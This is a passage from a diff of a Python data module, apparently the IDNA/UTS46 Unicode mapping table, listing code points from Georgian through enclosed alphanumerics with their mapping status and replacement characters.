(0x1CA1, 'M', 'ს'), + (0x1CA2, 'M', 'ტ'), + (0x1CA3, 'M', 'უ'), + (0x1CA4, 'M', 'ფ'), + (0x1CA5, 'M', 'ქ'), + (0x1CA6, 'M', 'ღ'), + (0x1CA7, 'M', 'ყ'), + (0x1CA8, 'M', 'შ'), + (0x1CA9, 'M', 'ჩ'), + (0x1CAA, 'M', 'ც'), + (0x1CAB, 'M', 'ძ'), + (0x1CAC, 'M', 'წ'), + (0x1CAD, 'M', 'ჭ'), + (0x1CAE, 'M', 'ხ'), + (0x1CAF, 'M', 'ჯ'), + (0x1CB0, 'M', 'ჰ'), + (0x1CB1, 'M', 'ჱ'), + (0x1CB2, 'M', 'ჲ'), + (0x1CB3, 'M', 'ჳ'), + (0x1CB4, 'M', 'ჴ'), + (0x1CB5, 'M', 'ჵ'), + (0x1CB6, 'M', 'ჶ'), + (0x1CB7, 'M', 'ჷ'), + (0x1CB8, 'M', 'ჸ'), + (0x1CB9, 'M', 'ჹ'), + (0x1CBA, 'M', 'ჺ'), + (0x1CBB, 'X'), + (0x1CBD, 'M', 'ჽ'), + (0x1CBE, 'M', 'ჾ'), + (0x1CBF, 'M', 'ჿ'), + (0x1CC0, 'V'), + (0x1CC8, 'X'), + (0x1CD0, 'V'), + (0x1CFB, 'X'), + (0x1D00, 'V'), + (0x1D2C, 'M', 'a'), + (0x1D2D, 'M', 'æ'), + (0x1D2E, 'M', 'b'), + (0x1D2F, 'V'), + (0x1D30, 'M', 'd'), + (0x1D31, 'M', 'e'), + (0x1D32, 'M', 'ǝ'), + (0x1D33, 'M', 'g'), + (0x1D34, 'M', 'h'), + (0x1D35, 'M', 'i'), + (0x1D36, 'M', 'j'), + (0x1D37, 'M', 'k'), + (0x1D38, 'M', 'l'), + (0x1D39, 'M', 'm'), + (0x1D3A, 'M', 'n'), + (0x1D3B, 'V'), + (0x1D3C, 'M', 'o'), + (0x1D3D, 'M', 'ȣ'), + (0x1D3E, 'M', 'p'), + (0x1D3F, 'M', 'r'), + (0x1D40, 'M', 't'), + (0x1D41, 'M', 'u'), + (0x1D42, 'M', 'w'), + (0x1D43, 'M', 'a'), + (0x1D44, 'M', 'ɐ'), + (0x1D45, 'M', 'ɑ'), + (0x1D46, 'M', 'ᴂ'), + (0x1D47, 'M', 'b'), + (0x1D48, 'M', 'd'), + (0x1D49, 'M', 'e'), + (0x1D4A, 'M', 'ə'), + (0x1D4B, 'M', 'ɛ'), + (0x1D4C, 'M', 'ɜ'), + (0x1D4D, 'M', 'g'), + (0x1D4E, 'V'), + (0x1D4F, 'M', 'k'), + (0x1D50, 'M', 'm'), + (0x1D51, 'M', 'ŋ'), + (0x1D52, 'M', 'o'), + (0x1D53, 'M', 'ɔ'), + ] + +def _seg_16() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D54, 'M', 'ᴖ'), + (0x1D55, 'M', 'ᴗ'), + (0x1D56, 'M', 'p'), + (0x1D57, 'M', 't'), + (0x1D58, 'M', 'u'), + (0x1D59, 'M', 'ᴝ'), + (0x1D5A, 'M', 'ɯ'), + (0x1D5B, 'M', 'v'), + (0x1D5C, 'M', 'ᴥ'), + (0x1D5D, 'M', 'β'), + (0x1D5E, 'M', 'γ'), + (0x1D5F, 'M', 'δ'), + (0x1D60, 'M', 'φ'), + (0x1D61, 'M', 'χ'), + (0x1D62, 'M', 'i'), + (0x1D63, 'M', 'r'), + (0x1D64, 'M', 'u'), + (0x1D65, 'M', 'v'), + (0x1D66, 'M', 'β'), + (0x1D67, 'M', 'γ'), + (0x1D68, 'M', 'ρ'), + (0x1D69, 'M', 'φ'), + (0x1D6A, 'M', 'χ'), + (0x1D6B, 'V'), + (0x1D78, 'M', 'н'), + (0x1D79, 'V'), + (0x1D9B, 'M', 'ɒ'), + (0x1D9C, 'M', 'c'), + (0x1D9D, 'M', 'ɕ'), + (0x1D9E, 'M', 'ð'), + (0x1D9F, 'M', 'ɜ'), + (0x1DA0, 'M', 'f'), + (0x1DA1, 'M', 'ɟ'), + (0x1DA2, 'M', 'ɡ'), + (0x1DA3, 'M', 'ɥ'), + (0x1DA4, 'M', 'ɨ'), + (0x1DA5, 'M', 'ɩ'), + (0x1DA6, 'M', 'ɪ'), + (0x1DA7, 'M', 'ᵻ'), + (0x1DA8, 'M', 'ʝ'), + (0x1DA9, 'M', 'ɭ'), + (0x1DAA, 'M', 'ᶅ'), + (0x1DAB, 'M', 'ʟ'), + (0x1DAC, 'M', 'ɱ'), + (0x1DAD, 'M', 'ɰ'), + (0x1DAE, 'M', 'ɲ'), + (0x1DAF, 'M', 'ɳ'), + (0x1DB0, 'M', 'ɴ'), + (0x1DB1, 'M', 'ɵ'), + (0x1DB2, 'M', 'ɸ'), + (0x1DB3, 'M', 'ʂ'), + (0x1DB4, 'M', 'ʃ'), + (0x1DB5, 'M', 'ƫ'), + (0x1DB6, 'M', 'ʉ'), + (0x1DB7, 'M', 'ʊ'), + (0x1DB8, 'M', 'ᴜ'), + (0x1DB9, 'M', 'ʋ'), + (0x1DBA, 'M', 'ʌ'), + (0x1DBB, 'M', 'z'), + (0x1DBC, 'M', 'ʐ'), + (0x1DBD, 'M', 'ʑ'), + (0x1DBE, 'M', 'ʒ'), + (0x1DBF, 'M', 'θ'), + (0x1DC0, 'V'), + (0x1E00, 'M', 'ḁ'), + (0x1E01, 'V'), + (0x1E02, 'M', 'ḃ'), + (0x1E03, 'V'), + (0x1E04, 'M', 'ḅ'), + (0x1E05, 'V'), + (0x1E06, 'M', 'ḇ'), + (0x1E07, 'V'), + (0x1E08, 'M', 'ḉ'), + (0x1E09, 'V'), + (0x1E0A, 'M', 'ḋ'), + (0x1E0B, 'V'), + (0x1E0C, 'M', 'ḍ'), + (0x1E0D, 'V'), + (0x1E0E, 'M', 'ḏ'), + (0x1E0F, 'V'), + (0x1E10, 'M', 'ḑ'), + (0x1E11, 'V'), + (0x1E12, 'M', 'ḓ'), + (0x1E13, 'V'), + (0x1E14, 'M', 'ḕ'), + (0x1E15, 'V'), + (0x1E16, 'M', 'ḗ'), + (0x1E17, 'V'), + (0x1E18, 'M', 'ḙ'), + (0x1E19, 'V'), + (0x1E1A, 'M', 'ḛ'), + (0x1E1B, 'V'), + (0x1E1C, 'M', 'ḝ'), + (0x1E1D, 'V'), + (0x1E1E, 'M', 'ḟ'), + (0x1E1F, 'V'), + (0x1E20, 'M', 'ḡ'), + (0x1E21, 'V'), + (0x1E22, 'M', 'ḣ'), + (0x1E23, 'V'), + ] + +def _seg_17() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1E24, 'M', 'ḥ'), + (0x1E25, 'V'), + (0x1E26, 'M', 'ḧ'), + (0x1E27, 'V'), + (0x1E28, 'M', 'ḩ'), + (0x1E29, 'V'), + (0x1E2A, 'M', 'ḫ'), + (0x1E2B, 'V'), + (0x1E2C, 'M', 'ḭ'), + (0x1E2D, 'V'), + (0x1E2E, 'M', 'ḯ'), + (0x1E2F, 'V'), + (0x1E30, 'M', 'ḱ'), + (0x1E31, 'V'), + (0x1E32, 'M', 'ḳ'), + (0x1E33, 'V'), + (0x1E34, 'M', 'ḵ'), + (0x1E35, 'V'), + (0x1E36, 'M', 'ḷ'), + (0x1E37, 'V'), + (0x1E38, 'M', 'ḹ'), + (0x1E39, 'V'), + (0x1E3A, 'M', 'ḻ'), + (0x1E3B, 'V'), + (0x1E3C, 'M', 'ḽ'), + (0x1E3D, 'V'), + (0x1E3E, 'M', 'ḿ'), + (0x1E3F, 'V'), + (0x1E40, 'M', 'ṁ'), + (0x1E41, 'V'), + (0x1E42, 'M', 'ṃ'), + (0x1E43, 'V'), + (0x1E44, 'M', 'ṅ'), + (0x1E45, 'V'), + (0x1E46, 'M', 'ṇ'), + (0x1E47, 'V'), + (0x1E48, 'M', 'ṉ'), + (0x1E49, 'V'), + (0x1E4A, 'M', 'ṋ'), + (0x1E4B, 'V'), + (0x1E4C, 'M', 'ṍ'), + (0x1E4D, 'V'), + (0x1E4E, 'M', 'ṏ'), + (0x1E4F, 'V'), + (0x1E50, 'M', 'ṑ'), + (0x1E51, 'V'), + (0x1E52, 'M', 'ṓ'), + (0x1E53, 'V'), + (0x1E54, 'M', 'ṕ'), + (0x1E55, 'V'), + (0x1E56, 'M', 'ṗ'), + (0x1E57, 'V'), + (0x1E58, 'M', 'ṙ'), + (0x1E59, 'V'), + (0x1E5A, 'M', 'ṛ'), + (0x1E5B, 'V'), + (0x1E5C, 'M', 'ṝ'), + (0x1E5D, 'V'), + (0x1E5E, 'M', 'ṟ'), + (0x1E5F, 'V'), + (0x1E60, 'M', 'ṡ'), + (0x1E61, 'V'), + (0x1E62, 'M', 'ṣ'), + (0x1E63, 'V'), + (0x1E64, 'M', 'ṥ'), + (0x1E65, 'V'), + (0x1E66, 'M', 'ṧ'), + (0x1E67, 'V'), + (0x1E68, 'M', 'ṩ'), + (0x1E69, 'V'), + (0x1E6A, 'M', 'ṫ'), + (0x1E6B, 'V'), + (0x1E6C, 'M', 'ṭ'), + (0x1E6D, 'V'), + (0x1E6E, 'M', 'ṯ'), + (0x1E6F, 'V'), + (0x1E70, 'M', 'ṱ'), + (0x1E71, 'V'), + (0x1E72, 'M', 'ṳ'), + (0x1E73, 'V'), + (0x1E74, 'M', 'ṵ'), + (0x1E75, 'V'), + (0x1E76, 'M', 'ṷ'), + (0x1E77, 'V'), + (0x1E78, 'M', 'ṹ'), + (0x1E79, 'V'), + (0x1E7A, 'M', 'ṻ'), + (0x1E7B, 'V'), + (0x1E7C, 'M', 'ṽ'), + (0x1E7D, 'V'), + (0x1E7E, 'M', 'ṿ'), + (0x1E7F, 'V'), + (0x1E80, 'M', 'ẁ'), + (0x1E81, 'V'), + (0x1E82, 'M', 'ẃ'), + (0x1E83, 'V'), + (0x1E84, 'M', 'ẅ'), + (0x1E85, 'V'), + (0x1E86, 'M', 'ẇ'), + (0x1E87, 'V'), + ] + +def _seg_18() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1E88, 'M', 'ẉ'), + (0x1E89, 'V'), + (0x1E8A, 'M', 'ẋ'), + (0x1E8B, 'V'), + (0x1E8C, 'M', 'ẍ'), + (0x1E8D, 'V'), + (0x1E8E, 'M', 'ẏ'), + (0x1E8F, 'V'), + (0x1E90, 'M', 'ẑ'), + (0x1E91, 'V'), + (0x1E92, 'M', 'ẓ'), + (0x1E93, 'V'), + (0x1E94, 'M', 'ẕ'), + (0x1E95, 'V'), + (0x1E9A, 'M', 'aʾ'), + (0x1E9B, 'M', 'ṡ'), + (0x1E9C, 'V'), + (0x1E9E, 'M', 'ss'), + (0x1E9F, 'V'), + (0x1EA0, 'M', 'ạ'), + (0x1EA1, 'V'), + (0x1EA2, 'M', 'ả'), + (0x1EA3, 'V'), + (0x1EA4, 'M', 'ấ'), + (0x1EA5, 'V'), + (0x1EA6, 'M', 'ầ'), + (0x1EA7, 'V'), + (0x1EA8, 'M', 'ẩ'), + (0x1EA9, 'V'), + (0x1EAA, 'M', 'ẫ'), + (0x1EAB, 'V'), + (0x1EAC, 'M', 'ậ'), + (0x1EAD, 'V'), + (0x1EAE, 'M', 'ắ'), + (0x1EAF, 'V'), + (0x1EB0, 'M', 'ằ'), + (0x1EB1, 'V'), + (0x1EB2, 'M', 'ẳ'), + (0x1EB3, 'V'), + (0x1EB4, 'M', 'ẵ'), + (0x1EB5, 'V'), + (0x1EB6, 'M', 'ặ'), + (0x1EB7, 'V'), + (0x1EB8, 'M', 'ẹ'), + (0x1EB9, 'V'), + (0x1EBA, 'M', 'ẻ'), + (0x1EBB, 'V'), + (0x1EBC, 'M', 'ẽ'), + (0x1EBD, 'V'), + (0x1EBE, 'M', 'ế'), + (0x1EBF, 'V'), + (0x1EC0, 'M', 'ề'), + (0x1EC1, 'V'), + (0x1EC2, 'M', 'ể'), + (0x1EC3, 'V'), + (0x1EC4, 'M', 'ễ'), + (0x1EC5, 'V'), + (0x1EC6, 'M', 'ệ'), + (0x1EC7, 'V'), + (0x1EC8, 'M', 'ỉ'), + (0x1EC9, 'V'), + (0x1ECA, 'M', 'ị'), + (0x1ECB, 'V'), + (0x1ECC, 'M', 'ọ'), + (0x1ECD, 'V'), + (0x1ECE, 'M', 'ỏ'), + (0x1ECF, 'V'), + (0x1ED0, 'M', 'ố'), + (0x1ED1, 'V'), + (0x1ED2, 'M', 'ồ'), + (0x1ED3, 'V'), + (0x1ED4, 'M', 'ổ'), + (0x1ED5, 'V'), + (0x1ED6, 'M', 'ỗ'), + (0x1ED7, 'V'), + (0x1ED8, 'M', 'ộ'), + (0x1ED9, 'V'), + (0x1EDA, 'M', 'ớ'), + (0x1EDB, 'V'), + (0x1EDC, 'M', 'ờ'), + (0x1EDD, 'V'), + (0x1EDE, 'M', 'ở'), + (0x1EDF, 'V'), + (0x1EE0, 'M', 'ỡ'), + (0x1EE1, 'V'), + (0x1EE2, 'M', 'ợ'), + (0x1EE3, 'V'), + (0x1EE4, 'M', 'ụ'), + (0x1EE5, 'V'), + (0x1EE6, 'M', 'ủ'), + (0x1EE7, 'V'), + (0x1EE8, 'M', 'ứ'), + (0x1EE9, 'V'), + (0x1EEA, 'M', 'ừ'), + (0x1EEB, 'V'), + (0x1EEC, 'M', 'ử'), + (0x1EED, 'V'), + (0x1EEE, 'M', 'ữ'), + (0x1EEF, 'V'), + (0x1EF0, 'M', 'ự'), + ] + +def _seg_19() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1EF1, 'V'), + (0x1EF2, 'M', 'ỳ'), + (0x1EF3, 'V'), + (0x1EF4, 'M', 'ỵ'), + (0x1EF5, 'V'), + (0x1EF6, 'M', 'ỷ'), + (0x1EF7, 'V'), + (0x1EF8, 'M', 'ỹ'), + (0x1EF9, 'V'), + (0x1EFA, 'M', 'ỻ'), + (0x1EFB, 'V'), + (0x1EFC, 'M', 'ỽ'), + (0x1EFD, 'V'), + (0x1EFE, 'M', 'ỿ'), + (0x1EFF, 'V'), + (0x1F08, 'M', 'ἀ'), + (0x1F09, 'M', 'ἁ'), + (0x1F0A, 'M', 'ἂ'), + (0x1F0B, 'M', 'ἃ'), + (0x1F0C, 'M', 'ἄ'), + (0x1F0D, 'M', 'ἅ'), + (0x1F0E, 'M', 'ἆ'), + (0x1F0F, 'M', 'ἇ'), + (0x1F10, 'V'), + (0x1F16, 'X'), + (0x1F18, 'M', 'ἐ'), + (0x1F19, 'M', 'ἑ'), + (0x1F1A, 'M', 'ἒ'), + (0x1F1B, 'M', 'ἓ'), + (0x1F1C, 'M', 'ἔ'), + (0x1F1D, 'M', 'ἕ'), + (0x1F1E, 'X'), + (0x1F20, 'V'), + (0x1F28, 'M', 'ἠ'), + (0x1F29, 'M', 'ἡ'), + (0x1F2A, 'M', 'ἢ'), + (0x1F2B, 'M', 'ἣ'), + (0x1F2C, 'M', 'ἤ'), + (0x1F2D, 'M', 'ἥ'), + (0x1F2E, 'M', 'ἦ'), + (0x1F2F, 'M', 'ἧ'), + (0x1F30, 'V'), + (0x1F38, 'M', 'ἰ'), + (0x1F39, 'M', 'ἱ'), + (0x1F3A, 'M', 'ἲ'), + (0x1F3B, 'M', 'ἳ'), + (0x1F3C, 'M', 'ἴ'), + (0x1F3D, 'M', 'ἵ'), + (0x1F3E, 'M', 'ἶ'), + (0x1F3F, 'M', 'ἷ'), + (0x1F40, 'V'), + (0x1F46, 'X'), + (0x1F48, 'M', 'ὀ'), + (0x1F49, 'M', 'ὁ'), + (0x1F4A, 'M', 'ὂ'), + (0x1F4B, 'M', 'ὃ'), + (0x1F4C, 'M', 'ὄ'), + (0x1F4D, 'M', 'ὅ'), + (0x1F4E, 'X'), + (0x1F50, 'V'), + (0x1F58, 'X'), + (0x1F59, 'M', 'ὑ'), + (0x1F5A, 'X'), + (0x1F5B, 'M', 'ὓ'), + (0x1F5C, 'X'), + (0x1F5D, 'M', 'ὕ'), + (0x1F5E, 'X'), + (0x1F5F, 'M', 'ὗ'), + (0x1F60, 'V'), + (0x1F68, 'M', 'ὠ'), + (0x1F69, 'M', 'ὡ'), + (0x1F6A, 'M', 'ὢ'), + (0x1F6B, 'M', 'ὣ'), + (0x1F6C, 'M', 'ὤ'), + (0x1F6D, 'M', 'ὥ'), + (0x1F6E, 'M', 'ὦ'), + (0x1F6F, 'M', 'ὧ'), + (0x1F70, 'V'), + (0x1F71, 'M', 'ά'), + (0x1F72, 'V'), + (0x1F73, 'M', 'έ'), + (0x1F74, 'V'), + (0x1F75, 'M', 'ή'), + (0x1F76, 'V'), + (0x1F77, 'M', 'ί'), + (0x1F78, 'V'), + (0x1F79, 'M', 'ό'), + (0x1F7A, 'V'), + (0x1F7B, 'M', 'ύ'), + (0x1F7C, 'V'), + (0x1F7D, 'M', 'ώ'), + (0x1F7E, 'X'), + (0x1F80, 'M', 'ἀι'), + (0x1F81, 'M', 'ἁι'), + (0x1F82, 'M', 'ἂι'), + (0x1F83, 'M', 'ἃι'), + (0x1F84, 'M', 'ἄι'), + (0x1F85, 'M', 'ἅι'), + (0x1F86, 'M', 'ἆι'), + (0x1F87, 'M', 'ἇι'), + ] + +def _seg_20() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1F88, 'M', 'ἀι'), + (0x1F89, 'M', 'ἁι'), + (0x1F8A, 'M', 'ἂι'), + (0x1F8B, 'M', 'ἃι'), + (0x1F8C, 'M', 'ἄι'), + (0x1F8D, 'M', 'ἅι'), + (0x1F8E, 'M', 'ἆι'), + (0x1F8F, 'M', 'ἇι'), + (0x1F90, 'M', 'ἠι'), + (0x1F91, 'M', 'ἡι'), + (0x1F92, 'M', 'ἢι'), + (0x1F93, 'M', 'ἣι'), + (0x1F94, 'M', 'ἤι'), + (0x1F95, 'M', 'ἥι'), + (0x1F96, 'M', 'ἦι'), + (0x1F97, 'M', 'ἧι'), + (0x1F98, 'M', 'ἠι'), + (0x1F99, 'M', 'ἡι'), + (0x1F9A, 'M', 'ἢι'), + (0x1F9B, 'M', 'ἣι'), + (0x1F9C, 'M', 'ἤι'), + (0x1F9D, 'M', 'ἥι'), + (0x1F9E, 'M', 'ἦι'), + (0x1F9F, 'M', 'ἧι'), + (0x1FA0, 'M', 'ὠι'), + (0x1FA1, 'M', 'ὡι'), + (0x1FA2, 'M', 'ὢι'), + (0x1FA3, 'M', 'ὣι'), + (0x1FA4, 'M', 'ὤι'), + (0x1FA5, 'M', 'ὥι'), + (0x1FA6, 'M', 'ὦι'), + (0x1FA7, 'M', 'ὧι'), + (0x1FA8, 'M', 'ὠι'), + (0x1FA9, 'M', 'ὡι'), + (0x1FAA, 'M', 'ὢι'), + (0x1FAB, 'M', 'ὣι'), + (0x1FAC, 'M', 'ὤι'), + (0x1FAD, 'M', 'ὥι'), + (0x1FAE, 'M', 'ὦι'), + (0x1FAF, 'M', 'ὧι'), + (0x1FB0, 'V'), + (0x1FB2, 'M', 'ὰι'), + (0x1FB3, 'M', 'αι'), + (0x1FB4, 'M', 'άι'), + (0x1FB5, 'X'), + (0x1FB6, 'V'), + (0x1FB7, 'M', 'ᾶι'), + (0x1FB8, 'M', 'ᾰ'), + (0x1FB9, 'M', 'ᾱ'), + (0x1FBA, 'M', 'ὰ'), + (0x1FBB, 'M', 'ά'), + (0x1FBC, 'M', 'αι'), + (0x1FBD, '3', ' ̓'), + (0x1FBE, 'M', 'ι'), + (0x1FBF, '3', ' ̓'), + (0x1FC0, '3', ' ͂'), + (0x1FC1, '3', ' ̈͂'), + (0x1FC2, 'M', 'ὴι'), + (0x1FC3, 'M', 'ηι'), + (0x1FC4, 'M', 'ήι'), + (0x1FC5, 'X'), + (0x1FC6, 'V'), + (0x1FC7, 'M', 'ῆι'), + (0x1FC8, 'M', 'ὲ'), + (0x1FC9, 'M', 'έ'), + (0x1FCA, 'M', 'ὴ'), + (0x1FCB, 'M', 'ή'), + (0x1FCC, 'M', 'ηι'), + (0x1FCD, '3', ' ̓̀'), + (0x1FCE, '3', ' ̓́'), + (0x1FCF, '3', ' ̓͂'), + (0x1FD0, 'V'), + (0x1FD3, 'M', 'ΐ'), + (0x1FD4, 'X'), + (0x1FD6, 'V'), + (0x1FD8, 'M', 'ῐ'), + (0x1FD9, 'M', 'ῑ'), + (0x1FDA, 'M', 'ὶ'), + (0x1FDB, 'M', 'ί'), + (0x1FDC, 'X'), + (0x1FDD, '3', ' ̔̀'), + (0x1FDE, '3', ' ̔́'), + (0x1FDF, '3', ' ̔͂'), + (0x1FE0, 'V'), + (0x1FE3, 'M', 'ΰ'), + (0x1FE4, 'V'), + (0x1FE8, 'M', 'ῠ'), + (0x1FE9, 'M', 'ῡ'), + (0x1FEA, 'M', 'ὺ'), + (0x1FEB, 'M', 'ύ'), + (0x1FEC, 'M', 'ῥ'), + (0x1FED, '3', ' ̈̀'), + (0x1FEE, '3', ' ̈́'), + (0x1FEF, '3', '`'), + (0x1FF0, 'X'), + (0x1FF2, 'M', 'ὼι'), + (0x1FF3, 'M', 'ωι'), + (0x1FF4, 'M', 'ώι'), + (0x1FF5, 'X'), + (0x1FF6, 'V'), + ] + +def _seg_21() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1FF7, 'M', 'ῶι'), + (0x1FF8, 'M', 'ὸ'), + (0x1FF9, 'M', 'ό'), + (0x1FFA, 'M', 'ὼ'), + (0x1FFB, 'M', 'ώ'), + (0x1FFC, 'M', 'ωι'), + (0x1FFD, '3', ' ́'), + (0x1FFE, '3', ' ̔'), + (0x1FFF, 'X'), + (0x2000, '3', ' '), + (0x200B, 'I'), + (0x200C, 'D', ''), + (0x200E, 'X'), + (0x2010, 'V'), + (0x2011, 'M', '‐'), + (0x2012, 'V'), + (0x2017, '3', ' ̳'), + (0x2018, 'V'), + (0x2024, 'X'), + (0x2027, 'V'), + (0x2028, 'X'), + (0x202F, '3', ' '), + (0x2030, 'V'), + (0x2033, 'M', '′′'), + (0x2034, 'M', '′′′'), + (0x2035, 'V'), + (0x2036, 'M', '‵‵'), + (0x2037, 'M', '‵‵‵'), + (0x2038, 'V'), + (0x203C, '3', '!!'), + (0x203D, 'V'), + (0x203E, '3', ' ̅'), + (0x203F, 'V'), + (0x2047, '3', '??'), + (0x2048, '3', '?!'), + (0x2049, '3', '!?'), + (0x204A, 'V'), + (0x2057, 'M', '′′′′'), + (0x2058, 'V'), + (0x205F, '3', ' '), + (0x2060, 'I'), + (0x2061, 'X'), + (0x2064, 'I'), + (0x2065, 'X'), + (0x2070, 'M', '0'), + (0x2071, 'M', 'i'), + (0x2072, 'X'), + (0x2074, 'M', '4'), + (0x2075, 'M', '5'), + (0x2076, 'M', '6'), + (0x2077, 'M', '7'), + (0x2078, 'M', '8'), + (0x2079, 'M', '9'), + (0x207A, '3', '+'), + (0x207B, 'M', '−'), + (0x207C, '3', '='), + (0x207D, '3', '('), + (0x207E, '3', ')'), + (0x207F, 'M', 'n'), + (0x2080, 'M', '0'), + (0x2081, 'M', '1'), + (0x2082, 'M', '2'), + (0x2083, 'M', '3'), + (0x2084, 'M', '4'), + (0x2085, 'M', '5'), + (0x2086, 'M', '6'), + (0x2087, 'M', '7'), + (0x2088, 'M', '8'), + (0x2089, 'M', '9'), + (0x208A, '3', '+'), + (0x208B, 'M', '−'), + (0x208C, '3', '='), + (0x208D, '3', '('), + (0x208E, '3', ')'), + (0x208F, 'X'), + (0x2090, 'M', 'a'), + (0x2091, 'M', 'e'), + (0x2092, 'M', 'o'), + (0x2093, 'M', 'x'), + (0x2094, 'M', 'ə'), + (0x2095, 'M', 'h'), + (0x2096, 'M', 'k'), + (0x2097, 'M', 'l'), + (0x2098, 'M', 'm'), + (0x2099, 'M', 'n'), + (0x209A, 'M', 'p'), + (0x209B, 'M', 's'), + (0x209C, 'M', 't'), + (0x209D, 'X'), + (0x20A0, 'V'), + (0x20A8, 'M', 'rs'), + (0x20A9, 'V'), + (0x20C1, 'X'), + (0x20D0, 'V'), + (0x20F1, 'X'), + (0x2100, '3', 'a/c'), + (0x2101, '3', 'a/s'), + (0x2102, 'M', 'c'), + (0x2103, 'M', '°c'), + (0x2104, 'V'), + ] + +def _seg_22() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2105, '3', 'c/o'), + (0x2106, '3', 'c/u'), + (0x2107, 'M', 'ɛ'), + (0x2108, 'V'), + (0x2109, 'M', '°f'), + (0x210A, 'M', 'g'), + (0x210B, 'M', 'h'), + (0x210F, 'M', 'ħ'), + (0x2110, 'M', 'i'), + (0x2112, 'M', 'l'), + (0x2114, 'V'), + (0x2115, 'M', 'n'), + (0x2116, 'M', 'no'), + (0x2117, 'V'), + (0x2119, 'M', 'p'), + (0x211A, 'M', 'q'), + (0x211B, 'M', 'r'), + (0x211E, 'V'), + (0x2120, 'M', 'sm'), + (0x2121, 'M', 'tel'), + (0x2122, 'M', 'tm'), + (0x2123, 'V'), + (0x2124, 'M', 'z'), + (0x2125, 'V'), + (0x2126, 'M', 'ω'), + (0x2127, 'V'), + (0x2128, 'M', 'z'), + (0x2129, 'V'), + (0x212A, 'M', 'k'), + (0x212B, 'M', 'å'), + (0x212C, 'M', 'b'), + (0x212D, 'M', 'c'), + (0x212E, 'V'), + (0x212F, 'M', 'e'), + (0x2131, 'M', 'f'), + (0x2132, 'X'), + (0x2133, 'M', 'm'), + (0x2134, 'M', 'o'), + (0x2135, 'M', 'א'), + (0x2136, 'M', 'ב'), + (0x2137, 'M', 'ג'), + (0x2138, 'M', 'ד'), + (0x2139, 'M', 'i'), + (0x213A, 'V'), + (0x213B, 'M', 'fax'), + (0x213C, 'M', 'π'), + (0x213D, 'M', 'γ'), + (0x213F, 'M', 'π'), + (0x2140, 'M', '∑'), + (0x2141, 'V'), + (0x2145, 'M', 'd'), + (0x2147, 'M', 'e'), + (0x2148, 'M', 'i'), + (0x2149, 'M', 'j'), + (0x214A, 'V'), + (0x2150, 'M', '1⁄7'), + (0x2151, 'M', '1⁄9'), + (0x2152, 'M', '1⁄10'), + (0x2153, 'M', '1⁄3'), + (0x2154, 'M', '2⁄3'), + (0x2155, 'M', '1⁄5'), + (0x2156, 'M', '2⁄5'), + (0x2157, 'M', '3⁄5'), + (0x2158, 'M', '4⁄5'), + (0x2159, 'M', '1⁄6'), + (0x215A, 'M', '5⁄6'), + (0x215B, 'M', '1⁄8'), + (0x215C, 'M', '3⁄8'), + (0x215D, 'M', '5⁄8'), + (0x215E, 'M', '7⁄8'), + (0x215F, 'M', '1⁄'), + (0x2160, 'M', 'i'), + (0x2161, 'M', 'ii'), + (0x2162, 'M', 'iii'), + (0x2163, 'M', 'iv'), + (0x2164, 'M', 'v'), + (0x2165, 'M', 'vi'), + (0x2166, 'M', 'vii'), + (0x2167, 'M', 'viii'), + (0x2168, 'M', 'ix'), + (0x2169, 'M', 'x'), + (0x216A, 'M', 'xi'), + (0x216B, 'M', 'xii'), + (0x216C, 'M', 'l'), + (0x216D, 'M', 'c'), + (0x216E, 'M', 'd'), + (0x216F, 'M', 'm'), + (0x2170, 'M', 'i'), + (0x2171, 'M', 'ii'), + (0x2172, 'M', 'iii'), + (0x2173, 'M', 'iv'), + (0x2174, 'M', 'v'), + (0x2175, 'M', 'vi'), + (0x2176, 'M', 'vii'), + (0x2177, 'M', 'viii'), + (0x2178, 'M', 'ix'), + (0x2179, 'M', 'x'), + (0x217A, 'M', 'xi'), + (0x217B, 'M', 'xii'), + (0x217C, 'M', 'l'), + ] + +def _seg_23() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x217D, 'M', 'c'), + (0x217E, 'M', 'd'), + (0x217F, 'M', 'm'), + (0x2180, 'V'), + (0x2183, 'X'), + (0x2184, 'V'), + (0x2189, 'M', '0⁄3'), + (0x218A, 'V'), + (0x218C, 'X'), + (0x2190, 'V'), + (0x222C, 'M', '∫∫'), + (0x222D, 'M', '∫∫∫'), + (0x222E, 'V'), + (0x222F, 'M', '∮∮'), + (0x2230, 'M', '∮∮∮'), + (0x2231, 'V'), + (0x2260, '3'), + (0x2261, 'V'), + (0x226E, '3'), + (0x2270, 'V'), + (0x2329, 'M', '〈'), + (0x232A, 'M', '〉'), + (0x232B, 'V'), + (0x2427, 'X'), + (0x2440, 'V'), + (0x244B, 'X'), + (0x2460, 'M', '1'), + (0x2461, 'M', '2'), + (0x2462, 'M', '3'), + (0x2463, 'M', '4'), + (0x2464, 'M', '5'), + (0x2465, 'M', '6'), + (0x2466, 'M', '7'), + (0x2467, 'M', '8'), + (0x2468, 'M', '9'), + (0x2469, 'M', '10'), + (0x246A, 'M', '11'), + (0x246B, 'M', '12'), + (0x246C, 'M', '13'), + (0x246D, 'M', '14'), + (0x246E, 'M', '15'), + (0x246F, 'M', '16'), + (0x2470, 'M', '17'), + (0x2471, 'M', '18'), + (0x2472, 'M', '19'), + (0x2473, 'M', '20'), + (0x2474, '3', '(1)'), + (0x2475, '3', '(2)'), + (0x2476, '3', '(3)'), + (0x2477, '3', '(4)'), + (0x2478, '3', '(5)'), + (0x2479, '3', '(6)'), + (0x247A, '3', '(7)'), + (0x247B, '3', '(8)'), + (0x247C, '3', '(9)'), + (0x247D, '3', '(10)'), + (0x247E, '3', '(11)'), + (0x247F, '3', '(12)'), + (0x2480, '3', '(13)'), + (0x2481, '3', '(14)'), + (0x2482, '3', '(15)'), + (0x2483, '3', '(16)'), + (0x2484, '3', '(17)'), + (0x2485, '3', '(18)'), + (0x2486, '3', '(19)'), + (0x2487, '3', '(20)'), + (0x2488, 'X'), + (0x249C, '3', '(a)'), + (0x249D, '3', '(b)'), + (0x249E, '3', '(c)'), + (0x249F, '3', '(d)'), + (0x24A0, '3', '(e)'), + (0x24A1, 